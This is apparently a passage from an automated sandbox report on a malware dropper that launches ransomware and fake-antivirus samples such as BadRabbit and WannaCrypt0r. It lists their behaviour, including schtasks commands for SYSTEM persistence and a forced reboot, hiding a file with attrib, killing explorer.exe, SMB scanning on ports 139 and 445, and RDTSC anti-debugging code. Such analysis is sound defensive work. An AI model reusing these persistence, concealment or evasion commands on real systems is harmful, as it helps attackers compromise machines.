          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\antivirus-platinum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000402641 second address: 0000000000402604 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-0Ch], eax 0x00000005 mov dword ptr [ebp-08h], edx 0x00000008 mov eax, dword ptr [ebp-0Ch] 0x0000000b sub eax, dword ptr [ebp-00000120h] 0x00000011 mov ecx, dword ptr [ebp-08h] 0x00000014 sbb ecx, dword ptr [ebp-0000011Ch] 0x0000001a leave 0x0000001b ret 0x0000001c mov esi, eax 0x0000001e call 00007FC928C34A33h 0x00000023 push ebp 0x00000024 mov ebp, esp 0x00000026 sub esp, 00000120h 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000401CE6 second address: 0000000000401C9C instructions: 0x00000000 rdtsc 0x00000002 sub eax, dword ptr [ebp-00000220h] 0x00000008 mov ecx, eax 0x0000000a add dword ptr [ebp-04h], ecx 0x0000000d jmp 00007FC9284A806Ah 0x0000000f mov eax, dword ptr [ebp-08h] 0x00000012 inc eax 0x00000013 mov dword ptr [ebp-08h], eax 0x00000016 mov eax, dword ptr [ebp-08h] 0x00000019 sub eax, 64h 0x0000001c je 00007FC9284A812Bh 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeRDTSC instruction interceptor: First address: 0000000000401D54 second address: 0000000000401D0A instructions: 0x00000000 rdtsc 0x00000002 sub eax, dword ptr [ebp-00000220h] 0x00000008 mov ecx, eax 0x0000000a add dword ptr [ebp-04h], ecx 0x0000000d jmp 00007FC928C34A3Ah 0x0000000f mov eax, dword ptr [ebp-08h] 0x00000012 inc eax 0x00000013 mov dword ptr [ebp-08h], eax 0x00000016 mov eax, dword ptr [ebp-08h] 0x00000019 sub eax, 64h 0x0000001c je 00007FC928C34AFBh 0x0000001e rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcess
          Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\bpkAAJptGv.exe TID: 3132Thread sleep count: 66 > 30Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exe TID: 3132Thread sleep time: -66000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exe TID: 5748Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\302746537.exe TID: 5260Thread sleep count: 490 > 30
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000
          Source: C:\Windows\302746537.exeWindow / User API: threadDelayed 490
          Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Krotten.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Fantom.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@NoMoreRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@NavaShield.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@PolyRansom.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeDropped PE file which has not been started: C:\Program Files (x86)\antiviruspc2009\bzip2.dllJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityScanner.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@LPS2019.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SE2011.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@ViraLock.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@VAV2008.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Petya.A.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@PCDefender.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeDropped PE file which has not been started: C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dllJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityCentral.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@RegistrySmart.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeDropped PE file which has not been started: C:\Program Files (x86)\antiviruspc2009\libltdl3.dllJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SmartDefragmenter.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@Xyeta.exeJump to dropped file
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeDropped PE file which has not been started: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeEvaded block: after key decisiongraph_12-11219
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,NetServerGetInfo,NetApiBufferFree,20_2_04E27D4E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: memset,memset,GetAdaptersInfo,GetAdaptersInfo,LocalAlloc,GetAdaptersInfo,inet_addr,inet_addr,inet_addr,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,htonl,LocalAlloc,inet_addr,htonl,htonl,CreateThread,FindCloseChangeNotification,LocalFree,20_2_04E28B2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,GetComputerNameExW,DhcpEnumSubnets,DhcpGetSubnetInfo,DhcpEnumSubnetClients,htonl,htonl,htonl,inet_ntoa,GetProcessHeap,HeapFree,DhcpRpcFreeMemory,DhcpRpcFreeMemory,20_2_04E28D39
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 180000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 300000
          Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 900000
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeAPI call chain: ExitProcess graph end nodegraph_12-10561
          Source: C:\Windows\302746537.exeAPI call chain: ExitProcess graph end nodegraph_15-3608
          Source: C:\Windows\302746537.exeAPI call chain: ExitProcess graph end nodegraph_15-3819
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: Endermanch@Cerber5.exe, 00000017.00000003.529413168.0000000001873000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpenSSH\;C:\Users
          Source: C:\Windows\870F.tmpProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,20_2_04E25A73
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00405C10 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,12_2_00405C10
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040AE97 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,12_2_0040AE97
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E25E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,20_2_04E25E9F
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformation
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_00411585 LoadLibraryA,LoadLibraryA,LoadLibraryA,#17,LoadLibraryA,GetProcAddress,FreeLibrary,SHGetMalloc,12_2_00411585
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 12_2_0040A1EC GetProcessHeap,RtlAllocateHeap,12_2_0040A1EC
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\870F.tmpProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Windows\302746537.exeCode function: 15_2_00403CC0 SetUnhandledExceptionFilter,15_2_00403CC0
          Source: C:\Windows\302746537.exeCode function: 15_2_00403B70 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,15_2_00403B70
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeCode function: 16_2_01101499 SetUnhandledExceptionFilter,UnhandledExcep,GetCurrentProcess,TerminateProcess,16_2_01101499

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.8 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.7 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.6 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.5 139
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\bpkAAJptGv.exe "C:\Users\user\Desktop\bpkAAJptGv.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" Jump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\bpkAAJptGv.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe" Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: unknown unknown
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\341C.tmp\302746537.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1382722661 && exit"
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:04:00
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E2841D GetCurrentProcessId,OpenProcess,OpenProcessToken,CloseHandle,DuplicateToken,AllocateAndInitializeSid,CheckTokenMembership,TerminateProcess,FreeSid,CloseHandle,CloseHandle,CloseHandle,20_2_04E2841D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 20_2_04E26FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,20_2_04E26FFE
